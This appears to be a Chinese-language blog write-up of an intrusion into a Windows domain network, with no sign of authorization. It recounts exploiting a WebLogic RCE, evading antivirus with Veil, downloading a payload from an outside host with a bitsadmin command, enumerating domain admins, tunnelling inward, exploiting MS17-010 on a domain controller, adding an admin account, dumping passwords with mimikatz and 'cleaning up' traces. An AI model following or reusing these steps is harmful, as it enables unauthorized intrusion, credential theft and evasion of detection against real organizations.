Somebody I can kiss,I want something just like this.
直接用WebLogic_Wls-Wsat_RCE_Exp.jar
exp获取到shell,和上一篇文章一样。
信息收集
1 | hostname -->OXXX |
攻击
此杀软,用Veil免杀
生成msf
的exp
就能过。利用bitsadmin
命令将exp
上传到目标机。1
bitsadmin /transfer n http://xxx.xxx.xxx/xxx.exe C:\xxx\xxx.exe
运行exp
,然后在msf
上监听得到shell
cs也来客串一下
因为不是系统权限,所以尝试了getsystem
命令提权,发现报错,mimikatz
也抓不出哈希,于是就收集了域信息1
2
3net group 查看组名
net group "domain admins" /domain 查看域管理员
nltest /dclist:ALxxx 查看域控
1
2
3SRxx -->192.168.101.1 域控
SRxxx -->192.168.101.8 域控
GBxxx -->192.168.121.1 域控
内网游游
内网渗透的本质是收集信息 –某大牛
现在已掌握的信息如下:1
2拿下了192.168.101.3(不完全控制,因为不是最高权限,也不打算往提权方面走,因为我懒)
明确域管和域控
利用x.3
机子作为代理机子,这里用到的是ew.exe
,代理访问内网。
ms17-010
似乎代理进内网第一件事情就是扫445端口
了
运气不错,发现域控192.168.101.8
存在445漏洞
,msf
里的ms17-010
的利用工具有四个,一个扫描漏洞,一个任意执行命令,两个反弹meterpreter
的shell
,这里只能用auxiliary/admin/smb/ms17_010_command
这模块的,也就是任意执行命令
想执行命令上传马儿的,但是powershell
和bitsadmin
命令执行完后各种报错上传不成功,也试过cs
各种exp
也弹不回来shell
,于是添加管理员用户远程链接之
上去后发现,原来机子不通外网,难怪之前的马儿回不来。。
mimikatz
将域控里的管理员密码全部dump出来
接下来可以拿着域管的账号登入到域里机子了,先尝试登入其他两个域控,运气不错,该域管也属于这两个域控的
域控都是不通外网的,擦屁股溜了~